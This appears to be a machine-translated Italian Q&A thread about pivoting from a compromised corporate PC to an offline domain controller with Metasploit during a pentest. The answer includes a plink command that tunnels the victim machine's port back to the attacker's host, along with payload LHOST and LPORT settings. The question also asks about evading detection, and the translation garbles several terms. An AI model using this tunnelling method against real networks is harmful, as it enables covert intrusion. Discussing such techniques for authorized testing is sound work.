Metasploit: pivoting per la macchina senza accesso a Internet

3

Immaginiamo il seguente scenario (non insolito):

  • Sto facendo un pentest dall'esterno
  • Ho una sessione meterpreter da un PC aziendale all'interno della loro infrastruttura (diciamo w / reverse HTTPS)
  • Diciamo che conosco il dominio admin pwd [solo per brevità!]
  • Voglio entrare nel DC
  • La DC non può connettersi a Internet

Come andresti su questo?

La prima sfida è quella di ottenere meterpreter sulla DC senza essere scoperti. Il mio istinto sarebbe quello di creare un eseguibile, firmarlo e quindi essere davvero oldschool: fare un "net use \ DC \ c $ ..." sulla macchina nel mezzo e copiarlo. Quindi pianificare in remoto un'attività con "at". C'è un modo più metasploity per farlo? I moduli psexec_ * funzionano anche tramite un meter meter di Windows?

La seconda sfida è: come si connetterebbe il misuratore sulla CC? Non sono riuscito a ottenere la funzionalità di named pipe di meterpreter per funzionare in modo affidabile. MSF riconosce di aver ricevuto una sessione, quindi il processo meterpreter sulla macchina nei crash intermedi. Ooops. [Modifica: si blocca solo quando la macchina centrale utilizza reverse_HTTPS. Funziona con reverse_tcp, con il blocco dispari che lascia il processo in sospeso. Ho presentato una segnalazione di errore. Attualmente non sono convinto che sia pronto per la produzione]

Port forwarding? La porta centrale della macchina si spegne e la DC si connette attraverso la macchina centrale a me? HTTPS? Apertura di nuove porte sui computer ok nel 2018?

Qual è il modo in cui questo scenario funziona entrambi e non attiva completamente tutti gli allarmi?

    
posta manduca 21.04.2018 - 20:59
fonte

1 risposta

1

"Hack Naked" - Assicurati di non avere alcun problema con il firewall perché potresti ottenere solo 1 colpo. Scopri la complessità di ottenere le porte inoltrate al tuo computer. Penso che dovrebbe farlo ... ma è necessario eseguire dei test una volta che ci si è assicurati di poter garantire la connettività.

  1. Configura port forwarding locale sul pc vittima con plink. (assumendo windows)

    • La vittima ascolta il 53 o quello che vuoi (usando 53 come esempio)
    • Vittima in avanti verso il tuo host sulla porta XYZ
    • Se si utilizza msf o nc, impostare il listener.
    • In caso di vittima: plink -batch -l root -pw {password} yourip -p {22} -L 53: 127.0.0.1: 4444
    • Ho messo {22} tra parentesi graffe perché non sai per certo se puoi aprire la porta 22 su quella porta. Le regole di uscita potrebbero non consentire l'uscita di ssh. Soprattutto se si tratta di un unico negozio di MS. Puoi spianare la mente sul reindirizzamento di iptables per una porta specifica a 22, o semplicemente aggiungere la porta di ascolto a sshd_config. Ricordando di ripristinare i valori predefiniti in seguito.
  2. Configurerai il tuo payload per connetterti alla porta aperta sul pc vittima ... ti affidi al tunnel di port forwarding sulla porta delle vittime 53 per essere ricevuto sulla porta locale del tuo sistema 4444.

    • LHOST = IP interno vittima
    • LPORT = 53
  3. Assicurati di verificare la connettività e quindi di fornire il tuo payload / execute

risposta data 22.04.2018 - 06:46
fonte

Leggi altre domande sui tag